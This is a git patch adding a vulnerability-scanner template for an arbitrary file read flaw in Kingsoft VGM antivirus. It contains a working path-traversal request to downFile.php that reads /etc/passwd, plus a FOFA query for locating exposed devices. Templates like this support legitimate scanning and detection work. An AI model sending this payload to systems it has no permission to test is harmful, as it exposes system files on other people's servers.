From 4d12dedcdac81caa337eb7690146e69838e64777 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 16 Oct 2023 22:45:10 +0530 Subject: [PATCH] Create kingsoft-vgm-lfi.yaml --- .../other/kingsoft-vgm-lfi.yaml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/vulnerabilities/other/kingsoft-vgm-lfi.yaml diff --git a/http/vulnerabilities/other/kingsoft-vgm-lfi.yaml b/http/vulnerabilities/other/kingsoft-vgm-lfi.yaml new file mode 100644 index 0000000000..cac3e4c778 --- /dev/null +++ b/http/vulnerabilities/other/kingsoft-vgm-lfi.yaml @@ -0,0 +1,37 @@ +id: kingsoft-vgm-lfi + +info: + name: Kingsoft VGM Antivirus - Arbitrary File Read + author: abbas.heybati + severity: high + description: | + There is an arbitrary file reading vulnerability in Kingsoft Antivirus. An attacker can obtain any file on the server through the vulnerability. + reference: + - https://mp.weixin.qq.com/s?__biz=MzkyMjE3MjEyNQ==&mid=2247486073&idx=1&sn=8e61e162262585bb8ce973b61df989b4&chksm=c1f925cbf68eacddfe441b8f1861e88068039712e467fb9bbe91eae31d439286c7147d197b07 + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/kongsoft-vgm-antivirus-wall-rce.yaml + metadata: + max-request: 1 + fofa-query: title="金山VGM防毒墙" + verified: true + tags: kingsoft,vgm,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/downFile.php?filename=../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "application/force-download" + + - type: status + status: + - 200